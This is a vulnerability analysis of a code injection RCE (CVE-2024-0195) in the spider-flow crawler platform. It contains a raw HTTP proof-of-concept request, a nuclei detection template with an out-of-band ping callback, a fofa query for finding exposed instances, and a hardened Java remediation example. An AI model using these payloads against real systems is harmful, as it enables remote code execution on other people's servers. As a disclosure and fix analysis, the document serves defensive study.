Spider-flow RCE Vulnerability Analysis (CVE-2024-0195)

0x01 Product overview

spider-flow is a highly flexible and configurable crawler platform in which crawlers are defined as flowcharts.

Download link: https://github.com/ssssssss-team/spider-flow

0x02 Vulnerability description

A vulnerability classified as critical was found in the FunctionService.saveFunction function of the file src/main/java/org/spiderflow/controller/FunctionController.java in spider-flow 0.4.3. It leads to code injection and can be triggered remotely.

The saved script is also executed again after every restart.

0x03 Affected versions

spider-flow 0.4.3

0x04 Search syntax

fofa

```
app="spiderflow"
```

0x05 Reproduction and analysis

System UI

![image-20240823214038307](spider-flow RCE漏洞分析.assets/image-20240823214038307.png)

Vulnerability PoC

```http
POST /function/save HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Origin: http://10.151.220.236:8088
Connection: close
Referer: http://10.151.220.236:8088/function-edit.html
Cookie: JSESSIONID=43BED3B6A9E85CBF4C4754F334C36953; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706163744; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706167658

id=&name=aaa&parameter=aaa&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{
```

Breakdown:

```javascript
Java.type('java.lang.Runtime').getRuntime().exec('calc');
```

Java.type('java.lang.Runtime'):

  • This uses a dynamic lookup to obtain the Runtime class, which provides methods for interacting with the runtime environment of the Java application.

getRuntime():

  • A static method of the Runtime class that returns the Runtime object of the current Java application.

exec('calc'):

  • The exec() method runs the given system command in the current environment. In this example the command is calc, which opens the Calculator application on Windows.

![image-20240823214109862](spider-flow RCE漏洞分析.assets/image-20240823214109862.png)

Function call chain

public String save(Function function)

![image-20240824160305280](spider-flow RCE漏洞分析.assets/image-20240824160305280.png)

->public String saveFunction(Function entity)

![image-20240824160245929](spider-flow RCE漏洞分析.assets/image-20240824160245929.png)

->public static void validScript(String functionName,String parameters,String script) throws Exception

![image-20240824160226239](spider-flow RCE漏洞分析.assets/image-20240824160226239.png)

->private static String concatScript(String functionName,String parameters,String script)

The variables are concatenated without any filtering

![image-20240824145657685](spider-flow RCE漏洞分析.assets/image-20240824145657685.png)

nuclei PoC

```yaml
id: CVE-2024-0195

info:
  name: SpiderFlow Crawler Platform - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.
  reference:
    - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md
    - https://vuldb.com/?id.249510
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0195
    - https://vuldb.com/?ctiid.249510
    - https://github.com/Tropinene/Yscanner
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0195
    cwe-id: CWE-94
    epss-score: 0.89846
    epss-percentile: 0.98769
    cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ssssssss
    product: "spider-flow"
    fofa-query:
      - "app=\"SpiderFlow\""
      - app="spiderflow"
  tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'SPIDER_FLOW_VERSION'

  - raw:
      - |
        POST /function/save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a004630440220441ad46885b455c236ce16bd52020d0f8f142b8b3c28f5eb9f4f2a683821342702207de3c7d603b1b1da12b5752330c2112c6411c15c8eaed0f87150be2c41d2959c:922c64590222798bb761d5b6d8e72950
```

![image-20240823214528864](spider-flow RCE漏洞分析.assets/image-20240823214528864.png)

0x06 Remediation

1. Filter the script when it is concatenated

2. Apply the patch
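To make the call chain and the first remediation point concrete, here is an added example in Java; it is not spider-flow's own code. The `concatScriptUnsafe` body is a hypothetical reconstruction of the concatenation shape implied by the payload (a script starting with `}` closes the generated function body and its tail `{` reopens it), not the project's actual `concatScript`. The hardened path is an assumption as well: it validates the name and parameter list as identifiers, rejects a script whose braces leave the function body, and, because the script is still arbitrary JavaScript evaluated in-process, runs the validation engine with a Nashorn `ClassFilter` that exposes no Java classes (`jdk.nashorn.api.scripting`, available on JDK 8u40 through 14; the example assumes spider-flow evaluates scripts with Nashorn).

```java
import java.util.regex.Pattern;
import javax.script.ScriptEngine;
import javax.script.ScriptException;
import jdk.nashorn.api.scripting.ClassFilter;
import jdk.nashorn.api.scripting.NashornScriptEngineFactory;

// Added example, not spider-flow's code: unfiltered concatenation beside a hardened variant.
public class FunctionScriptHardening {

    // Hypothetical shape of the vulnerable concatenation (assumed from the payload):
    // the script lands verbatim inside a function body, so "}...{" escapes the body
    // and the escaped part runs at top level as soon as the engine evaluates the string.
    static String concatScriptUnsafe(String functionName, String parameters, String script) {
        return "function " + functionName + "(" + parameters + "){" + script + "}";
    }

    private static final String IDENT = "[A-Za-z_$][A-Za-z0-9_$]*";
    private static final Pattern NAME = Pattern.compile(IDENT);
    private static final Pattern PARAMS =
            Pattern.compile("\\s*(" + IDENT + "(\\s*,\\s*" + IDENT + ")*)?\\s*");

    // Structural guard: brace depth must never drop below zero and must end at zero,
    // otherwise the script can close the generated function body early.
    static boolean bracesStayInsideBody(String script) {
        int depth = 0;
        for (int i = 0; i < script.length(); i++) {
            char c = script.charAt(i);
            if (c == '{') {
                depth++;
            } else if (c == '}') {
                depth--;
                if (depth < 0) {
                    return false;
                }
            }
        }
        return depth == 0;
    }

    // Hardened concatenation: every user-controlled piece is checked before it is joined.
    static String concatScriptChecked(String functionName, String parameters, String script) {
        if (!NAME.matcher(functionName).matches()) {
            throw new IllegalArgumentException("function name is not an identifier");
        }
        if (!PARAMS.matcher(parameters).matches()) {
            throw new IllegalArgumentException("parameter list is not a list of identifiers");
        }
        if (!bracesStayInsideBody(script)) {
            throw new IllegalArgumentException("script closes the function body early");
        }
        return "function " + functionName + "(" + parameters + "){" + script + "}";
    }

    // Nashorn engine whose ClassFilter exposes no Java class to scripts, so Java.type()
    // cannot resolve java.lang.Runtime (or anything else) even inside a well-formed body.
    static ScriptEngine restrictedEngine() {
        ClassFilter exposeNothing = className -> false;
        return new NashornScriptEngineFactory().getScriptEngine(exposeNothing);
    }

    // Counterpart of the page's validScript step: compile the function in the restricted engine.
    static void validScript(String functionName, String parameters, String script) throws ScriptException {
        restrictedEngine().eval(concatScriptChecked(functionName, parameters, script));
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a legitimate helper and the brace-escape shape of the page's payload.
        validScript("add", "a, b", "return a + b;");
        System.out.println("legitimate script accepted");

        String escapeShape = "}Java.type('java.lang.Runtime');{";
        System.out.println("unsafe concat would produce: " + concatScriptUnsafe("aaa", "aaa", escapeShape));
        try {
            validScript("aaa", "aaa", escapeShape);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // Even without the brace trick, the ClassFilter stops the class lookup itself.
        try {
            restrictedEngine().eval("Java.type('java.lang.Runtime')");
        } catch (Exception e) {
            System.out.println("Java.type blocked by ClassFilter: " + e);
        }
    }
}
```

The brace counter is deliberately simple: it does not understand string literals or comments, so a script containing `"}"` inside a string is rejected as well, which is the safe direction for this feature. It is a guard against the specific escape shown in the PoC, not a replacement for the ClassFilter or for authentication on `/function/save`; the project's actual patch may take a different approach, which is why the page's second recommendation is to apply it.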

0x07 Lessons learned

  1. Basic approach to code auditing:

    1. Find dangerous functions
    2. Examine their parameters
    3. Find the functions that call the dangerous functions
    4. Construct the exploit
  2. Use the Request (the name of the requested page) - Payload panel in Google's DevTools to obtain the form fields

  3. ! Writing crawlers